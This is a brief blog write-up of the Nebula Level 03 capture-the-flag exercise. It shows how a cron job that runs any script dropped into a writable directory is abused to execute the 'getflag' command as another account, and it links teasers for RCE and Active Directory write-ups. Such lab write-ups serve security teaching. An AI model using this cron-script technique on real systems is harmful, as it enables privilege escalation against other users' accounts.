Exploit-Education Nebula Level 03

less than 1 minute read

Exploit Education Level 3

Challenge

Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. Crontab is a service that run periodically. In this example the crontab executes the contents of any file inside crontab.d directory

Vulnerability

We can run any commands by writing the commands to a file in the crontab directory and writing the output to a file

level03@nebula:echo 'getflag >>/tmp/flag.txt' > run.sh
level03@nebula:/tmp$ ls
flag.txt  VMwareDnD  vmware-root
level03@nebula:/tmp$ cat flag.txt
You have successfully executed getflag on a target account

Solved

You may also enjoy

Blind RCE and DNS Exfilteration

6 minute read

Description: I was doing a security testing against a web server running WebLogic. A potential RCE due to CVE-2019-2725 was reported and I was verifying it. I was following the PoC given here.

Hack The Box - Forest Writeup

8 minute read

Description: Forest is a easy level box that can be really helpful to practice some AD related attacks. Although rated as easy, it was a medium box for me considering that all attack vectors where pretty new to me.